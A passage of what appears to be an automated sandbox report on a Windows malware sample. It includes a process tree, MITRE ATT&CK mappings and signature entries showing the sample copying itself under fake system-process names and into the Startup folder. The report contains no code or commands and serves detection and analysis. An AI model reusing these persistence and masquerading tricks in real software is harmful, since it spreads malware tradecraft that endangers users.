"09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00003912", "parentuid": "00000000-00005756", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "d7554af457c17be059e9be6f3314a74caffe2db8227849219593eab9cb497074"}, {"uid": "00000000-00001224", "parentuid": "00000000-00005756", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527"}, {"uid": "00000000-00003276", "parentuid": "00000000-00005192", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00002040", "parentuid": "00000000-00005192", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00004476", "parentuid": "00000000-00005192", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "d7554af457c17be059e9be6f3314a74caffe2db8227849219593eab9cb497074"}, {"uid": "00000000-00000308", "parentuid": "00000000-00004476", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "d7554af457c17be059e9be6f3314a74caffe2db8227849219593eab9cb497074"}, {"uid": "00000000-00003008", "parentuid": "00000000-00004476", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527"}, {"uid": "00000000-00002280", "parentuid": "00000000-00004476", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "9f3724961b6589b36e2ce66eed5f672c26e59a175840c9898496593592759bc8"}, {"uid": "00000000-00003272", "parentuid": "00000000-00005192", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"RegEdit_RegEdit\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for window \"Registry Editor\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for window \"Folder Options\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for window \"Local Settings\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"ExploreWClass\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"CabinetWClass\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"RebarWindow32\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"ComboBoxEx32\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"ComboBox\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"Edit\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location C:\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location C:\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.scr to new location C:\\4k51k4.exe (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CopyFileA\" to copy C:\\\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like 